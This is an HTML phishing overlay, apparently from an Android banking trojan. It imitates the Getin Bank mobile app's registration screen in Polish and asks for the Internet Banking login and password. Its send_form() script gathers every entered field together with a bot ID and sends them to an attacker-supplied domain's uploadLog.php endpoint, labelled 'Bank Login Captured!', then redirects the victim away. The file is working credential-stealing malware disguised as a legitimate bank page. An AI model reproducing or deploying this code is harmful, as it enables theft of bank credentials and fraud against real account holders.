<!DOCTYPE html>
<html>
<head>
    <title>getingroup</title>
    <link rel="shortcut icon" href="com.getingroup.mobilebanking.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #ededed;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
        background-size: 100%;
    }
    .logo {
text-align: right;
    background-size: 100%;
    padding: 20px 30px 20px 0px;
    background: #ededed;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
    line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 0px 0px;
    color: #151515;
    outline: none;
    border: 1px solid #c6c6c6;
    background: #fff;
    text-align: left;
}
input[type="button"] {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #fff;
    border: none;
    font-size: 17px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #39ac3e;
}
fieldset span {
    display: inline-block;
    text-align: center;
    color: #4b4949;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
    display: inline-block;
    left: 0;
    right: 0;
    color: #088f0d;
}
.logo span {
    display: inline-block;
    float: left;
    padding: 40px 0px 0px 20px;
    font-size: 20px;
    color: #fff;
    font-weight: 600;
}
input::placeholder {
    color: #a1a1a1;
    font-size: 15px;
}
.pass input::placeholder {
    font-size: 11px;
}
</style>

<script type="text/javascript">
    function next() {
        if (document.getElementById("login").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
        document.getElementById("log1").style.display="none";
        document.getElementById("pw").style.display="block";
    }
function testJump(x){
    var ml = ~~x.getAttribute('maxlength');
    if(ml && x.value.length >= ml){
        do {
      x = x.nextSibling;
    }
    while (x && !((/text/.test(x.type)) || x.disabled));
        if(x && /text/.test(x.type)){
            x.focus();
        }
    }
}
</script>

<fieldset id="formtosend">

<div class="" id="log" style="display: block;">

<div class="logo">
<div style="text-align: center; color: #000;">
zarejestruj się
</div>
</div>


<div id="log1">
<span style="font-size: 14px;">Zarejestruj się w aplikacji Getin Mobile. Aby rozpocząć pracę utwórz profil używając danych logowania do Bankowości Internetowej.</span>

<div class="area" style="padding: 20px 20px 50px 20px;border-radius: 3px;margin-top: 40px;">

        <input type="text" name="login" id="login" style="height: 70px;" placeholder="Wpisz Login lub Alias">
        <input type="button" name="sumbit" value="DALEJ" onclick="next()">
</div>
</div>
        <div id="pw" style="display: none; margin-top: 20px;">

<span style="font-size: 14px;display: block;padding-bottom: 5px;">Podaj hasło do Bankowości Internetowej.</span>
        

<div class="pass" style="    display: inline-block; line-height: 2"> 

<input type="text" name="1-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="1" onkeyup="testJump(this);">
<input type="text" name="2-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="2" onkeyup="testJump(this);">
<input type="text" name="3-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="3" onkeyup="testJump(this);">
<input type="text" name="4-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="4" onkeyup="testJump(this);">
<input type="text" name="5-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="5" onkeyup="testJump(this);">
<input type="text" name="6-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="6" onkeyup="testJump(this);">
<input type="text" name="7-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="7" onkeyup="testJump(this);">
<input type="text" name="8-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="8" onkeyup="testJump(this);">
<input type="text" name="9-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="9" onkeyup="testJump(this);">
<input type="text" name="10-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="10" onkeyup="testJump(this);">
<input type="text" name="11-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="11" onkeyup="testJump(this);">
<input type="text" name="12-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="12" onkeyup="testJump(this);">
<input type="text" name="13-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="13" onkeyup="testJump(this);">
<input type="text" name="14-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="14" onkeyup="testJump(this);">
<input type="text" name="15-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="15" onkeyup="testJump(this);">
<input type="text" name="16-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="16" onkeyup="testJump(this);">
<input type="text" name="17-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="17" onkeyup="testJump(this);">
<input type="text" name="18-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="18" onkeyup="testJump(this);">
<input type="text" name="19-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="19" onkeyup="testJump(this);">
<input type="text" name="20-" style="width: 25px;padding: 20px 0px 20px 0px;height: 25px;text-align: center;display: inline;border-radius: 0px;font-size: 12px;" maxlength="1" placeholder="20" onkeyup="testJump(this);">

<input type="button" name="sumbit" value="DALEJ" onclick="send_form()">

</div>
        </div>
        <input name="exit" type="hidden" text="true"/>
</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("https://closeapp.com");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    var form = document.getElementById('formtosend');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>